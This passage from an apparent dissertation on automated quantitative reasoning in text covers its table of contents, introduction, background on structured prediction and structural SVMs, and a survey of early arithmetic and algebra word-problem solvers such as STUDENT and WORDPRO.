67 6.6 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67 Chapter 7 Unit Dependency Graphs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69 7.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69 7.2 Unit Dependency Graph . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 7.3 Learning to Predict UDGs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 7.3.1 Vertex Classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 7.3.2 Edge Classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73 7.3.3 Constrained Inference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73 7.4 Joint Inference With An Arithmetic Solver . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74 vi 7.4.1 Monotonic Expression Tree . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74 7.4.2 Arithmetic Word Problem Solver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74 7.4.3 Joint Inference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75 7.4.4 Consistent Rate Unit Graphs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76 7.5 Experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78 7.5.1 Dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78 7.5.2 Data Acquisition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 7.5.3 UDG Prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 7.5.4 Solving Arithmetic Word Problems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81 7.5.5 Discussion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82 7.6 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 Chapter 8 Mapping to Declarative Knowledge . . . . . . . . . . . . . . . . . . . . . . . . . 84 8.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84 8.2 Knowledge Representation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85 8.2.1 Transfer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86 8.2.2 Dimensional Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 8.2.3 Explicit Math . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 8.2.4 Part-Whole Relation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 8.3 Mapping of Word Problems to Declarative Knowledge . . . . . . . . . . . . . . . . . . . . . . 89 8.3.1 Scoring Answer Derivations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 8.3.2 Learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91 8.3.3 Inference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92 8.4 Model and Implementation Details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92 8.4.1 Supervision . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92 8.4.2 Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93 8.5 Experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94 8.5.1 Results on Existing Dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94 8.5.2 New Dataset Creation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97 8.5.3 Generalization from Biased Dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97 8.5.4 Results on the New Dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98 8.5.5 Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98 8.6 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99 8.7 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100 Chapter 9 Conclusion and Future Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102 9.1 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102 9.2 Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103 9.3 Future Directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103 9.3.1 Commonsense Quantitative Reasoning . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 9.3.2 Unified Framework for Solvers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 9.3.3 Automated Math Tutoring System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105 Appendix A Lexicon for Equation Parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110 Appendix B Declarative Rules for Arithmetic Word Problems . . . . . . . . . . . . . . . . . . . . . . 112 vii List of Tables 3.1 Schemas used in WORDPRO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 4.1 10-fold cross-validation results of segmentation accuracy and time required for segmentation, the columns for runtime have been normalized and expressed as ratios . . . . . . . . . . . . . 32 4.2 Results of QE; Adding Semantics(+SEM) consistently improves performance; Only 43.3% of entailing quantities can be recovered by simple string matching . . . . . . . . . . . . . . . . . 33 4.3 Micro-averaged accuracy in detecting monetary mentions . . . . . . . . . . . . . . . . . . . . 33 5.1 Input and output for Equation Parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38 5.2 Summary of notations used in this chapter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39 5.3 Statistics of dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 5.4 Performance of Quantity Trigger List Prediction . . . . . . . . . . . . . . . . . . . . . . . . . 47 5.5 Performance of Variable Trigger List Prediction . . . . . . . . . . . . . . . . . . . . . . . . . . 47 5.6 Performance of Equation Tree Prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 5.7 Performance on equation parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 6.1 Performance of LCA Operation classifier on the datasets AI2, IL and CC. . . . . . . . . . . . 63 6.2 Performance of Relevance classifier on the datasets AI2 and IL. . . . . . . . . . . . . . . . . . 65 6.3 Accuracy in correctly solving arithmetic problems. First four rows represent various configu- rations of our system. We achieve state of the art results in both AI2 and IL datasets. . . . . 66 7.1 Units of rate quantities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 7.2 Performance of system components for predicting vertex and edge labels for unit dependency graphs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 7.3 Performance in predicting UDGs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81 7.4 Performance in solving arithmetic word problems . . . . . . . . . . . . . . . . . . . . . . . . . 81 7.5 Examples of problems which UnitDep gets correct, but LCA++ does not. . . . . . . . . . . 83 8.1 Two examples of arithmetic word problems, and derivation of the answer. For each combina- tion, first a knowledge type is chosen, and then a declarative rule from that knowledge type is chosen to infer the operation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89 8.2 Accuracy in solving arithmetic word problems. All columns except the last report 5-fold cross validation results. ∗ indicates statistically significant improvement (p = 0.05) over second highest score in the column. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96 8.3 Pairs of pertubed problems, along with the systems which get them correct . . . . . . . . . . 96 8.4 Examples which Knowledge gets correct, but UnitDep does not. . . . . . . . . . . . . . . . 99 8.5 Examples of errors made by Knowledge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99 viii List of Figures 5.1 A sentence with its trigger list and equation tree. −r indicates subtraction with order rl. . . 38 6.1 An arithmetic word problem, solution expression and the corresponding expression tree . . . 54 6.2 Two different expression trees for the numeric expression (3 × 5) + 7 − 8 − 9. The right one is monotonic, whereas the left one is not. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55 7.1 An arithmetic word problem, its UDG, and a tree representation of the solution (66 − 10)/8. Several dependencies exist between the UDG and the final solution of a problem. Here, “66” and “10” are connected via Same Unit edge, hence they can be added or subtracted, “8” is connected by Den Unit to the question, indicating that some expression will be divided by “8” to get the answer’s unit. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 8.1 An example arithmetic word problem and its solution, along with the type of domain knowl- edge required to generate each operation of the solution . . . . . . . . . . . . . . . . . . . . . 85 8.2 Annotations in our dataset. Number List refers to the numbers detected in the problem. The subscripts in the solution indicate the position of the numbers in the number list. . . . . . . . 93 ix Chapter 1 Introduction 1.1 Motivation Numbers are an integral part of natural language. We use numbers extensively to communicate how hot the weather is, how well our favorite team played in the last game, etc. Newspaper articles regularly report statistics to present an objective assessment of a situation, ranging from the number of people killed in a bomb blast, to the amount of money embezzled by a politician. To understand such articles, one often needs to figure out several properties of the numbers used in them, and how these numbers interact with the rest of the story. Consider the following sentence taken from a news article in the Chicago Tribune [Chi, 2017]: Emanuel spent $13.6 million from July until the Feb. 24 election and spent an additional $6.3 million in the following five weeks. In order to understand the sentence, one has to understand the following for each numeric mention: 1. Unit: Indicates which object is being referred to. One has to understand which numbers indicate monetary amounts, and which ones indicate date and time, etc. 2. Associated Verb: Indicates the effect of the number on the world, whether it is indicating the state of an economy, or amount of money in a transaction, etc. In this case, both “13.6 million” and “6.3 million” have the verb “spend” associated with it, indicating both are expenditures made by the campaign. 3. Arguments: Indicates the entities interacting with the number. For example, for a monetary trans- action, you want to know the recipient and the donor. In the example above, knowing that both “13.6 million” and “6.3 million” are expenditures made by Emanuel, enables the reader to understand that in total, Emanuel spent 19.9 million dollars. 1 There is also a need to understand interactions of several numbers mentioned across several sentence in text. Consider the following excerpt from a recent news article [Syr, 2017]. Local sources told The New Arab that a car bomb had targeted a Free Syria Army checkpoint at the refugee camp on the Syrian border with Jordan, killing two FSA fighters and injuring several others . . .. Jordanian border police responded by opening fire on the attacking vehicle killing a child, according to the sources. A car bomb in January killed at least seven people at the same camp. Around 85,000 people live in the Rukban camp . . .. An earlier car bomb attack near the camp, in the hinterland border area on June 21 last year that resulted in the deaths of six Jordanian military personnel. In order to report the total number of deaths reported in the article, one has to analyze how the different numbers in the story interact. One has to understand that the number of people living in the camp (“85,000”) is irrelevant for calculating the number of casualties. All numbers stating the number of victims need to be identified from all sentences in the article, like “two FSA fighters”, “a child”, “at least seven people”, etc. Finally all such numbers need to be summed up. All these challenges come under the umbrella of quantitative reasoning. In spite of the difficulties involved, human beings are adept at performing quantitative reasoning to understand natural language text. However, this is not true for automated language understanding systems. Relatively little work in Natural Language Processing has analyzed the use of quantities in text. Even in areas where we have relatively mature solutions, like information retrieval, we fail to deal with quantities; for example, one cannot search the financial media for “transactions in the 1-2 million pounds range.” In this dissertation, we investigate the challenges in performing automated quantitative reasoning. We formulate several tasks that we believe to be fundamental to addressing these challenges, and address the problem of developing robust natural language understanding methods for these tasks, using statistical machine learning. 1.2 Math Word Problems: An Abstraction for Quantitative Reasoning In this thesis we suggest that the vast majority of quantitative reasoning problems that occur frequently in text can be viewed, as math wold problems that are solved by elementary and middle schools kids. Lets look at a simple math word problem which students solve in elementary school. 2 Ryan has 72 marbles and 17 blocks. If he shares the marbles among 9 friends, how many marbles does each friend get? Even in such a simple quantitative reasoning problem, there are several challenges involving multiple inter- actions among the numbers in the text. One needs to understand that the question asks for the “marbles” each “friend” gets, so the number of “blocks” should have no effect on the answer. One needs to understand the impact of the associated verb “shares”, and that division is needed to calculate the correct answer. Note that this bears clear resemblance with the challenges of quantitative reasoning discussed earlier. There are also several advantages in focusing on math word problems. The language in these problems is relatively simple, and requires understanding of a few related concepts. This helps us to focus on quantitative reasoning, without addressing overly complicated NLP issues. These problems are readily available from textbooks and tutoring websites. As a result, developing benchmark datasets is relatively easy. Several pieces of work described in this thesis, particularly in the later chapters (Chapter 6, 7 and 8), have been evaluated on the ability to automatically solve math word problems. However, the solutions are applicable for general quantitative reasoning problems. 1.3 Challenges in Automated Quantitative Reasoning Building automated systems for quantitative reasoning involves developing an information extraction system which detects key properties of a quantity, as well as developing a reasoning system which captures the interaction of several numbers in text. Developing such a system is challenging because of several reasons which we explain and illustrate in the following subsections. 1.3.1 Variability of Natural Language Text An initial step in performing quantitative reasoning is to identify quantities mentioned in natural language text, to understand what they mean and what they refer to. We address this by identifying the quantity and its unit, and representing them in a canonical form. This step is challenging because the same quantity can be expressed in several forms, a problem we refer to as variability. For example, the quantity “$13.6 million” can be written as “USD 13.6 million”, “13600000 dollars”, “13600000$”. In addition, the same amount of money can be expressed in some other currency unit (like euros). This will require some unit conversion to understand that it refers to the same amount of money. Another challenge is the effect of several modifiers 3 on quantities. Consider the difference between “more than 5 hours”, “5 hours”, and “around 5 hours”. Although all three phrases are similar in terms of lexical overlap, they represent different quantity values. In order to capture the difficulties in detecting and normalizing numbers, and their impact on quantitative reasoning, we formulate a new task called Quantity Entailment (QE). This task draws its motivation from the general Recognizing Textual Entailment (RTE) problem [Dagan et al., 2013]. Given two sentences T and H, the task of QE is to determine whether a given quantity in H can be inferred from a given text snippet T . An example is shown below. T : A bomb in a Hebrew University cafeteria killed five Americans and four Israelis. H: A bombing at Hebrew University in Jerusalem killed nine people, including five Americans. For this example, the output of QE is that the phrase “nine people” can be implied by the phrase “fives Americans and four Israelis”. We investigate this task in Chapter 4, and discuss effective solutions to quantity detection and normalization, and ultimately show its effectiveness in determining quantity entailment. 1.3.2 Quantity Argument Detection To reason with respect to numbers, it is important to extract all information related to it from the sentence. For example, if a number is indicating a transaction, one needs to know the donor and the recipient; if a number represents a relation between two entities, one needs to know what those entities are. Consider the following example: Emanuel’s campaign contributions total thrice those of his opponents put together. To understand the sentence above, its important to know that “thrice” denotes a relation between “Emanuel’s campaign contributions” and “the contributions of his opponents”. Often, not all the entities associated with a relation are explicitly mentioned in the sentence; they have to be inferred from the context. Consider the following sentence [Gun, 2015]. On an average day this year, 36 Americans were killed by guns. Here, one needs to use the understanding of “average”, and infer that the relation that is described involves the number of gun violence deaths each day of the year. 4 In order to capture these challenges, we formulate the task of equation parsing. The task takes as input a sentence representing a mathematical relation among at most two entities. The output of equation parsing is an equation which represents the relation expressed in the sentence. In addition to the equation, the output also provides a grounding for the variables in the equation, that is, it provides a mapping of the variables in the equation to text snippets indicating what the variables stand for. We discuss this problem in Chapter 5. 1.3.3 Reasoning about Multiple Quantities Reasoning over multiple quantities often require correct hierarchical composition of numbers with mathe- matical operations, as in the case of the following math word problem: Isabel picked 66 flowers for her friends wedding. She was making bouquets with 8 flowers in each one. If 10 of the flowers wilted before the wedding, how many bouquets could she still make? In order to answer this question, 66 needs to be subtracted from 10, and only then the result needs to be divided by 8. First, we have to decide the order in which the numbers need to be composed, and second, we have to decide the math operation for each combination. This kind of hierarchical composition poses a challenge for quantitative reasoning. To address this, we introduce novel decomposition strategies in Chapters 6 and 8. Our decomposition strategies allow reducing a math word problem with any number of quantities, into simple quantitative reasoning problems over at most two quantities each. We utilize this decomposition to develop a system for automatically solving math word problems like the example above, and achieve state of the art results. 1.3.4 Incorporating Domain Knowledge Domain knowledge often significantly influences the outcome of quantitative reasoning. A key reason humans do very well in quantitative reasoning is that they can easily use their understanding of the world and background knowledge to make inferences. For example, in the math word problem in subsection 1.3.3, a child can easily infer that “wilt” should result in subtraction, since no one uses wilted flowers in bouquets. Also, since the unit of “8” is “flowers per bouquet”, it should be used in a division operation. Indeed, understanding of verb interaction and rate relationships seem essential to solving the problem. All these indicate that there is a need to effectively integrate domain knowledge into any quantitative reasoning system, which will be the focus of the last part of the thesis. 5 1.4 Contributions of the Thesis In this thesis, we investigate each of the challenges mentioned above, for automated quantitative reasoning. In particular, we make the following claim: Current NLP pipeline is not sufficient to extract an abstraction of text required to perform quantitative reasoning. However quantitative reasoning over text can be facilitated by identifying quantities, units, and integrating domain knowledge about mathematical relations into machine learning methods. To perform quantitative reasoning over multiple quantities, we can decompose the problem into simpler components, where each component is a simpler quantitative reasoning problem over at most two quantities. The primary contributions of the thesis are summarized below: 1. We propose a statistical approach to quantity detection and normalization based on numbers, units and modifiers. We show that this is an effective approach to support simple quantitative reasoning. 2. We exemplify the drawbacks of current syntactic and semantic parsers to extract the abstraction need to support quantitative reasoning. 3. We exploit natural properties of equations to reduce search space, and propose a pipeline architecture to efficiently and effectively predict mathematical relations expressed in a single sentence. 4. We propose a novel decomposition procedure to support quantitative reasoning over multiple mentions of numbers. We show that this decomposition allows simple reasoning over pairs of quantities to be composed effectively, to perform quantitative reasoning over multiple numbers across several sentences. 5. We introduce a structure called “unit dependency graphs” to represent the relationships between the units of various numbers in text, and the question you need to answer using that text. We show that unit dependency graphs capture the domain knowledge about unit compatibility and dimensional analysis, and can be effectively used to incorporate such domain knowledge in quantitative reasoning systems. 6. We propose a framework to integrate any form of declarative knowledge into word problem solving. We show that this declarative knowledge based method learns better models from limited data, as well as, obtains the right abstraction even in the presence of biased data. 6 1.5 Overview of the Thesis This section provides a guide for the rest of the thesis. The thesis can be broadly categorized into four logical segments. Part I: Background The first part of this thesis surveys background work in the areas of quantitative reasoning, structured learning and inference. These chapters do not provide exhaustive surveys of these research directions and we will only go over relevant material here and include additional pointers as necessary. A reader familiar with machine learning and structured learning paradigms, can only skim these parts, and focus only on the background work in quantitative reasoning. Chapter 2 is devoted to this part. Part II: Quantity Extraction, Normalization and Equation Parsing This part of the thesis discusses work related to quantities at a mention level or sentence level. We discuss effective approaches to extract and normalize quantities into a standard form. We also show how we can leverage certain natural properties of a sentence to extract mathematical relations between entities in the sentence. The part constitutes two chapters. • Chapter 4 discusses our approach to quantity extraction and normalization, and its application to textual entailment problems. • Chapter 5 describes methods to analyze mathematical relations described within a single sentence, as well as, extract the relevant entities for the relation. Part III: Solving Arithmetic Word Problems This part focuses on quantitative reasoning problems which span across multiple sentences. We found that math word problems form a natural abstraction to the challenges we usually encounter in across sentence quantitative reasoning. As a result, this part will focus on building robust solvers for math word problems. We however do not look at the entire range of word problems, which might require a wide range of background knowledge. We restrict our focus to arithmetic word problems; these are story problems which students solve in elementary school. The answers to these problems can be usually found by combining the numbers in the problem text by simple basic operations. This part constitutes three chapters: 7 • Chapter 6 describes a decomposition strategy which is key in applying quantitative reasoning over multiple numbers mentioned across several sentences. We show how this decomposition can be used to develop an end to end arithmetic word problem solver. • Chapter 7 introduces a structure called “unit dependency graphs” to capture the relations among the units of different numbers mentioned in text. We show how these graphs can be used to incorporate do- main knowledge about rate relationships, unit compatibility and dimensional analysis to word problem solving and to general quantitative reasoning. • Chapter 8 describes a framework to integrate any form of declarative knowledge into a word problem solver. We use the framework to integrate four common forms of domain knowledge for arithmetic word problems. We show that the declarative knowledge helps our system learn more effectively in the presence of limited data. Part IV: Conclusion The final part of the thesis offers concluding remarks. It summarizes the contributions of this dissertation and identifies directions for future research that can be built on top of this work. This can be found in Chapter 9. 8 Chapter 2 Background Statistical machine learning approaches are widely used in many areas of natural language of processing, in particular, in predicting semantic annotations and linguistic structures. In this chapter, we cover a few basic machine learning concepts which will be used in the rest of the thesis. We mainly focus on structured prediction, since this is the paradigm most widely used in this thesis. We introduce the problem of structured prediction via the example of part of speech tagging, and outline common approaches to solve this problem. 2.1 What is a Structure? The concept of a structure is an important one in computational linguistics and machine learning. Burton- Roberts (1997) informally defines a structure as a complex object that is divisible into component parts, each of which can belong to different categories, have specific functions in the complete object and are arranged in a specifiable way. We will use the task of part-of-speech tagging as a running example in this section. We will use the following sentence as an illustrative example: I have twenty dollars in my pocket . The goal of part of speech tagging is to label each word in the sentence by one of 45 part-of-speech tags. Any valid output for the sentence above is a set of 8 part-of-speech tags, one for each word in the sentence. This set of 8 part-of-speech tags can be referred as a structure. 2.2 Structured Prediction Let us now formulate the part of speech tagging problem as a structured prediction problem. We will denote the input sentence to the problem as x, and the output structure is denoted as yvec. In this case, the output structure y can be decomposed into a set of m variables y1,y2, . . . ,yk, where m is the number of words in the 9 input sentence x. Each of the yi variables denotes the part of speech tag for the i-th word of input sentence x. Therefore, each yi can be assigned one of the 45 part-of-speech tags. Finally we define X as the space of all possible inputs to a problem. Here, it will denote the space of all sentences. We also define Y as the space of all possible outputs. In our example, this will denote the set of all sequences of part of speech tags. The structured prediction problem is to learn a mapping function f(x; w) from an input space X to an output space Y. This mapping function is parameterized with weights w of task relevant features φ(x, y). Note that the feature function is defined over both the input x and the entire output structure y. This definition of a feature function allows us to design features to express the dependency between the local output variables for instances. In general, designing feature templates requires domain knowledge. For example, in our running example, it is common to use words in x conjuncted with the corresponding part of speech tag in y as features. We use the weight vector w and the feature function φ(x, y), to define a scoring function for output structures. Often it takes the following linear form: S(y; w, x) = wT φ(x, y) We want this scoring function to assign a higher score to the correct output structure, and assign a lower score to all other structures. 2.3 Inference in Structured Models Suppose we have a weight vector w, such that scoring function S(y; w,x) scores the correct output structure higher than all other structures. How will we use such a scoring function to predict an output structure for an input x ? This involves searching for the best structure according to the scoring function; this is referred to as the inference problem in structured prediction. Mathematically, this seen as computing the following. y∗ = arg max y∈Y wT φ(x, y) where Y is the space of feasible output structures. Note that the part of Y you need to search over, is usually very large. Consider the case of our part of speech tagging example. For an input sentence of m words, the number of possible tag sequence is (45)m, since each word can have one of the 45 tags. As a result, naively enumerating all output sequences and checking their score, is not a feasible solution. 10 There are three options to solve the inference problem in a reasonably efficient way. First, you can transform the problem to an Integer Linear Program (ILP), and then use an off the shelf ILP solver to solve the problem. This can still become intractable if the ILP contains a lot of variables. Another option is to make independence assumptions between different parts of the output structure. An example of this in our tagging task can be to assume that the part of speech of the i th word is dependent only on the i th word and the part of speech tag of the (i− 1) th word. These assumptions are often valid for the problem, and lead to efficient inference algorithms. However, for the problems we will address in this thesis, independence assumptions usually do not hold. Hence, we opt for the third option, which is to perform approximate inference using beam search. The main idea behind beam search is to enumerate all possible assignments to the first output variable, and score them. Keep only the top k assignments and discard the rest. Next for each assignment of the first variable, enumerate all possible assignments for the second output variable, and again, keep the k highest scoring partial assignments, and discard the rest, and so on. Here k is often referred to as the beam size. Lets see how we can perform beam search for the part of speech tagging example. We will assign y1 (the output variable for the first word) all the 45 tags, and score each assignment. Scores of these partial assignments can be computed by using only the features that are dependent on y1. We keep the top k, and move on to y2, and so on. Although beam search is an approximate procedure, in practice, it is very effective. Also, the beam size is a parameter, which can be chosen to be a small value if the output space for the problem is very large. 2.4 Learning Structured Prediction Models Finally, we discuss how to obtain a good scoring function for output structures. For this problem, assume we have access to a set of n labeled training examples D = {(xi, yi)}ni=1. The learning problem is to find a weight vector w, such that it scores the target output structure higher than other structure. This means that you want the value of wT φ(xi, yi) to be higher than wT φ(xi, y), where y is any other feasible output structure. There are several learning algorithms which can be used to obtain such a weight vector. In this thesis, we mostly use structural Support Vector Machines; we introduce them in the following subsection. 11 2.4.1 Structural Support Vector Machines Structured SVMs are a generalization of the binary SVM algorithm [Cortes and Vapnik, 1995] to structured outputs [Tsochantaridis et al., 2005]. The goal of the learning is to solve the following optimization problem: min w 1 2 wT w +C ∑ i L(xi, yi, w) where L(xi, yi, w) is the loss function for the structured prediction. The loss function is written as L(xi, yi, w) = l(max y∈Y ∆(yi, y) −wT φ(xi, yi) + wT φ(xi, y)) Here ∆ signifies the quality of the structure y with respect to the annotated structure yi. The function l(·) can be instantiated by loss functions like the hinge loss, with l(x) = max(0,x). Different algorithms have been proposed in the literature to solve the optimization problem [Joachims et al., 2009, Shalev-Shwartz et al., 2007, Chang et al., 2010]. In this thesis, we use the Illinois-SL package [Chang et al., 2015] with the dual-coordinate descent based algorithms. 2.5 Discussion and Special Case For learning and inference with structured models, we need to specify the following: 1. The feature representation for a structure y for an input x, denoted as φ(x, y). 2. An inference algorithm that finds the best structure for an input x using a weight vector w. 3. A learning algorithm. Note that both binary and multiclass classification problems are special cases of structured prediction. As a result, a structured predictor can be used for binary and multiclass classification. Here we describe how can we convert a multiclass classification problem to a structured problem. Lets assume a multiclass classification problem of K classes. Usually feature functions for multiclass problems are defined only on the input x; lets denote it as φ(x). To convert this to a structured problem, we consider the output space Y to be the set of class labels. We also define the feature function φ(x, y) to be the set of features φ(x) conjoined with the label y. With these definitions, we can now use the standard structured learning algorithm to do multiclass classification. In this thesis, we follow this procedure to perform multiclass classification with Illinois-SL. 12 2.6 Structured Prediction with Latent Variables Until now, our structured prediction framework has only two types of variables – input variables x and output variables y. Both these variables are observed, that is, they are available as part of our training data. However, often times, important modeling information is not provided as part of the training data. For example, for the task of machine translation from English to French, training data comprises English sentences paired with corresponding translated French sentences. There are several intermediate variables which allow the translation of an English sentence to French, like the ones indicating word level or phrase level alignments. However these alignment variables are not provided as part of the training data. Even though these variables are not provided, it is important to model them, in order to capture the process of translation. In such cases, they are modeled as latent variables h ∈ H, where H is the set of feasible assignments to the hidden variables. In order to extend the structured prediction formulation to the case of hidden variables, we redefine the feature function to also use the hidden variables (written as φ(x, h, y)). The inference problem is now to compute (h∗, y∗) = arg max (h,y)∈H×Y wT φ(x, h, y) This part remains similar to the earlier case; we simply have to think of the output structure as a tuple comprising both the output and hidden variables. For learning, we again assume access to n labeled examples D = {(xi, yi)}ni=1. The learning problem is to find a weight vector w, such that it scores the target output structure higher than other structures. The score of a structure y is now given as follows: max h∈H wT φ(x, h, y) In this thesis, we mostly use structural SVM with latent variables [Yu and Joachims, 2009]. This involves solving the following optimization problem: min w [ 1 2 wT w +C ∑ i max (ĥ,ŷ)∈H×Y [wT φ(xi, ĥ, ŷ) + ∆(yi, ĥ, ŷ)] ] − [ C ∑ i max h∈H wT φ(xi, h, yi) ] where ∆(·) is again a loss function indicating the dissimilarity between ŷ and yi. See [Yu and Joachims, 2009] for details of the algorithm to solve the above optimization. 13 Chapter 3 Early Work in Quantitative Reasoning Work on quantitative reasoning problems in NLP dates back to the 1960’s. Over the years, several efforts have been made to automatically solve different types of quantitative problems described in natural language text. Most of these systems were essentially rule based, and imposed strong restrictions on the input text. Only recently, statistical methods have been used in this context, and the focus has been on achieving robustness in handling a wide range of natural language text. In this chapter, we give an overview of these early systems, starting from the 1960’s to the present day. 3.1 Early Algebra and Arithmetic Solvers Several efforts were made to automatically solve arithmetic and algebra word problems. We describe a few of them in the following subsections. 3.1.1 STUDENT Program The STUDENT program written by [Bobrow, 1964] is the first system that tried to solve algebraic problems stated in natural language. It accepts inputs in a restricted set of English language and tries to solve the algebraic problem expressed in it. An example input to the STUDENT system is If the number of customer Tom gets is twice the square of 20% of the number of advertisement he runs, and the number of advertisements he runs is 45, what is the number of customer Tom gets ? The system parses individual sentences to extract mathematical relations among variables. They identify variables by several keywords, and consider the words around these keywords as identifiers for the variables. For example, “the number of customer Tom gets” is a variable where the key word is “number”. They cannot handle coreference, hence multiple usage of the same variable will require the exact same phrase to 14 be mentioned. In the above example, both the variable phrases “the number of customer Tom gets” and “the number of advertisements he runs” are repeated verbatim when the same variable is used again. Applying a set of rules recursively, complex sentence constructs are simplified into simpler forms free of conjunctions. Certain substitutions (e.g. “2 times” for “twice”), and truncations (e.g. “square of” to “square”) etc. are done until only the phrases representing variables remain, and are related with basic operators (like plus, times, percent etc.) to form a set of equations representing the problem. After such transformation the above problem becomes: (EQUAL X00001 (NUMBER OF CUSTOMER TOM GETS)) (EQUAL (NUMBER OF ADVERTISEMENTS HE RUNS) 45) (EQUAL (NUMBER OF CUSTOMERS TOM GETS) (TIMES 2 (EXPT (TIMES 0.2 (NUMBER OF ADVERTISEMENTS HE RUNS)) 2))) Finally standard techniques for solving system of equations are used to get the answer. 3.1.2 Other Arithmetic Word Problem Solvers Another system called WORDPRO was developed by [Fletcher, 1985] for solving arithmetic word prob- lems. WORDPRO was the first to introduce the concept of set “schema” [Marshall, 1995] as the basis of construction of problem model. Schemas can be thought as categories for the arithmetic word problem; each schema also has several attributes associated with it. For example, a “change” schema represents relation amongst a start-set (“Joe had 3 marbles”), transfer-set (“Then Tom gave him 5 marbles”) and result-set (“How many marbles does Joe have now?”). Table 3.1 lists the instantiations of three “schemas” used in WORDPRO. They also used a categorization of these schemas based on which component of the schema is the question asking about. The program solves a problem guided by list of rules which are applied sequen- tially. A drawback of WORDPRO was that it did not accept natural language text as input, it assumes that the input problem has already been mapped to a set of propositions. Two other programs, namely CHIPS [Diane J. Briars, 1984] and ARITHPRO [Dellarosa, 1986] could also solve one-step arithmetic word problems with only one possible operation – addition/subtraction. Both CHIPS and ARITHPRO categorize simple word problems into the same three categories: compare, combine and change. But for both these models rigid limitations were imposed on the change verb (only “to give”) and on the order of the problem sentences (the first sentence of the problem must describe the number of objects the owner had to begin with, whereas the second sentence must contain the verb “gave”). 15 Schema Instantiations Change John has 3 apples. Then he gave 2 apples to Susan. How many apples does Fred have now ? Combine Adam has 3 apples. Sarah has 6 apples. How many apples do they have altogether ? Compare Dennis has 6 apples. Fred has 5 apples. How many apples does Fred have less than Dennis ? Table 3.1: Schemas used in WORDPRO [Bakman, 2007] developed a more advanced arithmetic problem solver called ROBUST, that could un- derstand multi-step arithmetic word problems and that too with extraneous information. An example for a problem handled by ROBUST is as 